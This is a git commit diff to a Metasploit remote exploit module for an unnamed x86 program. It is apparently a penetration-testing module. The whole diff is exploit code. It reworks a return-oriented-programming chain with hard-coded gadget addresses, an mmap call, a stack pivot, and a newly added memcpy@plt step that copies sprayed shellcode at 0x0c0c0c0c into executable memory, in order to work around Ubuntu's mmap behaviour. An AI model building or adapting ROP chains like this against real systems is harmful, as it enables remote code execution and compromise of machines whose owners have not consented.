add memcpy to the ropchain due to the zeroed mmap function under ubuntu
parent
baf1ce22b3
commit
6b639ad2ee
|
@ -34,13 +34,19 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Arch' => ARCH_X86,
|
'Arch' => ARCH_X86,
|
||||||
'mmap' => [
|
'mmap' => [
|
||||||
0x0816f768, #mmap_64@plt
|
0x0816f768, #mmap_64@plt
|
||||||
0x0c0c0c0c, #NOPSLED+SHELLCODE
|
0x8666d07, #add esp, 0x14 / pop ebx / pop ebp / ret
|
||||||
0x0c0c0000,
|
0x0c0c0000,
|
||||||
0x00010000,
|
0x00002000,
|
||||||
0x00000007,
|
0x00000007,
|
||||||
0x00000031,
|
0x00000031,
|
||||||
0xffffffff,
|
0xffffffff,
|
||||||
0x00000000,
|
0x00000000,
|
||||||
|
0x78696761,
|
||||||
|
0x0816e4c8, #memcpy@plt
|
||||||
|
0x0c0c0c0c,
|
||||||
|
0x0c0c0000,
|
||||||
|
0x0c0b0000,
|
||||||
|
0x00002000
|
||||||
],
|
],
|
||||||
'ret' => [0x08055a70], #ret
|
'ret' => [0x08055a70], #ret
|
||||||
'gadget1' => "0x836e204", #mov eax,DWORD PTR [eax] / call DWORD PTR [eax+0x1c]
|
'gadget1' => "0x836e204", #mov eax,DWORD PTR [eax] / call DWORD PTR [eax+0x1c]
|
||||||
|
|
Loading…
Reference in New Issue